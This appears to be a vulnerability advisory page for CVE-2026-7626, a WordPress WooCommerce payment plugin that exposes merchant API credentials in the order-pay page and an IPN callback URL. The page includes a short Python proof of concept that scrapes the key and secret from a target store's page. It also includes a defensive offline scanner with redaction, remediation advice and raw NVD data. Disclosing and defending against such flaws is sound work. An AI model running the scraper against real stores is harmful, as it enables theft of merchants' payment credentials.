Security Vulnerability Report
CVE-2026-7626 CVSS 5.3 MEDIUM

Published: 2026-05-12 09:16:58
Last Modified: 2026-05-12 14:03:53

Description

The Slek Gateway for WooCommerce plugin for WordPress is vulnerable to Information Exposure in version 1.0. This is due to the wsb_handle_slek_payment_redirect() function placing the merchant's slek_key and slek_secret API credentials directly into a client-side HTML form, and additionally embedding the slek_secret as a plaintext GET parameter in the IPN callback URL. This makes it possible for unauthenticated attackers who can place an order on the affected store to extract the merchant's API credentials by viewing the HTML source or using browser DevTools on the WooCommerce order-pay page before the JavaScript auto-submit fires.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Note that this vector records no confidentiality impact (C:N) and only low integrity impact (I:L), even though the description is a plaintext exposure of the merchant's API secret. Treat the 5.3 as the CNA's published scoring, not as a measure of what an attacker holding a merchant's slek_secret can do against the payment provider's API.

Configurations (Affected Products)

No CPE configuration data is available for this record (vulnStatus: Deferred). The affected product named in the advisory is:

Slek Gateway for WooCommerce 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
from bs4 import BeautifulSoup

# Proof of Concept: extract the Slek API credentials from the WooCommerce order-pay page.
# The attacker first places an order on the target store, then opens that order's
# order-pay URL (the order id and order key below are placeholders).
target_url = "http://target-site.com/checkout/order-pay/123/?key=wc_order_xxxx"

# Fetch the order-pay page. requests does not run JavaScript, so the auto-submit
# described in the advisory never fires and the form is returned exactly as rendered.
response = requests.get(target_url)

if response.status_code == 200:
    soup = BeautifulSoup(response.text, 'html.parser')

    # The advisory says the credentials are written straight into the client-side form.
    # The input names 'slek_key' and 'slek_secret' are assumed from the description,
    # not confirmed against the plugin source.
    slek_key_input = soup.find('input', {'name': 'slek_key'})
    slek_secret_input = soup.find('input', {'name': 'slek_secret'})

    if slek_key_input and slek_secret_input:
        print(f"[+] Slek Key found: {slek_key_input.get('value')}")
        print(f"[+] Slek Secret found: {slek_secret_input.get('value')}")
    else:
        # Fall back to a raw substring check: the secret is also embedded as a GET
        # parameter in the IPN callback URL, which may sit in another attribute or script.
        print("[-] Credentials not found in form inputs, checking source code...")
        if "slek_secret" in response.text:
            print("[+] Potential secret exposure found in page source.")
else:
    print(f"[-] Failed to retrieve page. Status code: {response.status_code}")
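The PoC above only looks for the two hidden inputs and otherwise falls back to a substring match. The advisory describes two distinct exposure paths, the hidden form fields and the IPN callback URL carrying slek_secret as a query parameter, and a store owner triaging a saved copy of their order-pay page wants both found and reported without re-leaking the values. The following is an added example, not code from the page or from the plugin: it parses a constructed sample page offline with only the standard library, extracts credentials from every input and from the query string of every URL-valued attribute, and redacts them for reporting. The field names slek_key, slek_secret and ipn_url, the wc-api slug and all credential values in the sample are assumptions for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# Constructed sample of what a vulnerable order-pay page might look like per the
# CVE description: hidden inputs holding the merchant credentials, plus an IPN
# callback URL carrying the secret as a GET parameter. Field names, the wc-api
# slug and the credential values are assumptions, not taken from the plugin.
SAMPLE_ORDER_PAY_HTML = """
<form id="slek_payment_form" method="post" action="https://pay.example.invalid/checkout">
  <input type="hidden" name="amount" value="49.00">
  <input type="hidden" name="slek_key" value="pk_live_ASSUMED_KEY_1234">
  <input type="hidden" name="slek_secret" value="sk_live_ASSUMED_SECRET_abcd">
  <input type="hidden" name="ipn_url"
         value="https://shop.example.invalid/?wc-api=slek_ipn&amp;order_id=123&amp;slek_secret=sk_live_ASSUMED_SECRET_abcd">
</form>
<script>document.getElementById('slek_payment_form').submit();</script>
"""

# Parameter names that must never reach the client (assumed from the advisory text).
SENSITIVE_NAMES = {"slek_key", "slek_secret"}


class HiddenInputCollector(HTMLParser):
    """Collect name/value pairs of every <input> and every absolute URL in an attribute."""

    def __init__(self):
        super().__init__()
        self.inputs = {}
        self.urls = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and a.get("name") is not None:
            self.inputs[a["name"]] = a.get("value") or ""
        # HTMLParser unescapes entities for us, so "&amp;" in the sample is "&" here.
        for attr in ("value", "action", "src", "href"):
            v = a.get(attr)
            if v and "://" in v:
                self.urls.append(v)


def find_credential_exposure(html):
    """Return (location, name, value) for every credential leaked into the page.

    location is "input:<name>" for a form field and "url:<scheme://host/path>"
    for a query-string parameter in any URL-valued attribute (the IPN callback case).
    """
    p = HiddenInputCollector()
    p.feed(html)
    findings = []
    for name, value in p.inputs.items():
        if name in SENSITIVE_NAMES and value:
            findings.append(("input:" + name, name, value))
    for url in p.urls:
        parts = urlsplit(url)
        base = parts.scheme + "://" + parts.netloc + parts.path
        for name, values in parse_qs(parts.query).items():
            if name in SENSITIVE_NAMES:
                for v in values:
                    findings.append(("url:" + base, name, v))
    return findings


def redact(value):
    """Keep only a short prefix so the report does not itself become a credential leak."""
    return value[:8] + "..." if len(value) > 8 else "***"


if __name__ == "__main__":
    for location, name, value in find_credential_exposure(SAMPLE_ORDER_PAY_HTML):
        print(f"[+] {name} exposed at {location}: {redact(value)}")
```

Run it against HTML saved from your own store's order-pay page (with JavaScript disabled, or captured before the auto-submit redirects) rather than the constructed sample. A clean result only means the two assumed parameter names were not found; any secret that appears in the page or in a callback URL should be treated as compromised and rotated with the payment provider, and the IPN endpoint should authenticate callbacks with a per-order value that is never sent to the customer's browser.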

References

https://plugins.trac.wordpress.org/browser/slek-gateway-for-woocommerce/tags/1.0/slek-gateway-for-woocommerce.php#L267
https://plugins.trac.wordpress.org/browser/slek-gateway-for-woocommerce/tags/1.0/slek-gateway-for-woocommerce.php#L307
https://plugins.trac.wordpress.org/browser/slek-gateway-for-woocommerce/trunk/slek-gateway-for-woocommerce.php#L267
https://plugins.trac.wordpress.org/browser/slek-gateway-for-woocommerce/trunk/slek-gateway-for-woocommerce.php#L307
https://www.wordfence.com/threat-intel/vulnerabilities/id/45ccc116-866e-467f-8ebb-8a3b6589c069?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-7626", "sourceIdentifier": "[email protected]", "published": "2026-05-12T09:16:57.727", "lastModified": "2026-05-12T14:03:52.757", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Slek Gateway for WooCommerce plugin for WordPress is vulnerable to Information Exposure in version 1.0. This is due to the wsb_handle_slek_payment_redirect() function placing the merchant's slek_key and slek_secret API credentials directly into a client-side HTML form, and additionally embedding the slek_secret as a plaintext GET parameter in the IPN callback URL. This makes it possible for unauthenticated attackers who can place an order on the affected store to extract the merchant's API credentials by viewing the HTML source or using browser DevTools on the WooCommerce order-pay page before the JavaScript auto-submit fires."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/slek-gateway-for-woocommerce/tags/1.0/slek-gateway-for-woocommerce.php#L267", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/slek-gateway-for-woocommerce/tags/1.0/slek-gateway-for-woocommerce.php#L307", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/slek-gateway-for-woocommerce/trunk/slek-gateway-for-woocommerce.php#L267", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/slek-gateway-for-woocommerce/trunk/slek-gateway-for-woocommerce.php#L307", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/45ccc116-866e-467f-8ebb-8a3b6589c069?source=cve", "source": "[email protected]"}]}}